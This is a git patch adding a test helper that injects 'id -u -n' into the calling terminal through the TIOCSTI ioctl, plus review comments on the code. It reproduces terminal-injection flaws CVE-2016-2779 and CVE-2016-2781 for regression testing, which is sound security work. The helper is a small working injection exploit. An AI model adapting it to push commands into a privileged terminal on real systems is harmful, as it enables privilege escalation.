From a0a8e9884443601abf9f06b715f2f6bb0820cbad Mon Sep 17 00:00:00 2001
From: Stanislav Brabec
Date: Wed, 2 Mar 2016 20:35:54 +0100
Subject: tests: Add helper for TIOCSTI exploit

This helper/exploit injects "id -u -n\n" to the vulnerable calling terminal. Use id -u -n to get a reproducible output of test cases based on it.

What can happen:

Nothing, no exploit: pty is not accessible, setsid() disconnected the task from pty, TIOCSTI failed.

The command is injected to the unprivileged environment pty, and you see e.g. "nobody": This is acceptable.

The command is injected to the caller (privileged) pty, and you see "root" (or caller uid name): This is not acceptable and has security implications.

References:

CVE-2016-2779
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2779
http://seclists.org/oss-sec/2016/q1/448
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=815922
https://bugzilla.redhat.com/show_bug.cgi?id=173008
https://bugzilla.suse.com/show_bug.cgi?id=968674
https://bugzilla.suse.com/show_bug.cgi?id=968675

CVE-2016-2781
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2781
http://seclists.org/oss-sec/2016/q1/452

Signed-off-by: Stanislav Brabec
Cc: Federico Bento
---
 tests/helpers/Makemodule.am  |  3 +++
 tests/helpers/test_tiocsti.c | 27 +++++++++++++++++++++++++++
 2 files changed, 30 insertions(+)
 create mode 100644 tests/helpers/test_tiocsti.c

diff --git a/tests/helpers/Makemodule.am b/tests/helpers/Makemodule.am index 0618e7578..3070a8bbc 100644 --- a/tests/helpers/Makemodule.am +++ b/tests/helpers/Makemodule.am @@ -15,3 +15,6 @@ check_PROGRAMS += test_sigreceive test_sigreceive_SOURCES = tests/helpers/test_sigreceive.c test_sigreceive_LDADD = $(LDADD) libcommon.la +check_PROGRAMS += test_tiocsti +test_tiocsti_SOURCES = tests/helpers/test_tiocsti.c + diff --git a/tests/helpers/test_tiocsti.c b/tests/helpers/test_tiocsti.c new file mode 100644 index 000000000..c269dc037 --- /dev/null
+++ b/tests/helpers/test_tiocsti.c @@ -0,0 +1,27 @@ +/* + * test_tiocsti - test security of TIOCSTI + * + * Written by Federico Bento + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License as + * published by the Free Software Foundation. + * + * This program is distributed in the hope that it would be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program; if not, write to the Free Software Foundation, Inc., + * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + */ + +#include + +int main(void) +{ + char *cmd = "id -u -n\n"; + while(*cmd) + ioctl(0, TIOCSTI, cmd++); +} -- cgit v1.2.3-55-g7522
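Review bot: the third added line in the tests/helpers/Makemodule.am hunk is an empty line at the end of the file, after test_tiocsti_SOURCES. It accounts for one of the three insertions in the diffstat and can be dropped, or moved above check_PROGRAMS += test_tiocsti so that it separates the new entry from the test_sigreceive block instead of trailing the file.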
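Review bot: in main() of tests/helpers/test_tiocsti.c the return value of ioctl(0, TIOCSTI, cmd++) is discarded, so the "TIOCSTI failed" outcome listed in the commit message looks the same in a test log as the other no-exploit cases, and the loop keeps pushing the remaining bytes after the first failure. Suggest stopping on a negative return, reporting errno on stderr and returning a non-zero exit status, so the calling test can tell a rejected injection from one that was never attempted. Smaller points: cmd can be declared const char *, and a one-line comment above main() saying that the helper writes into the input queue of whatever terminal is on fd 0 would help anyone running the test suite from a privileged shell.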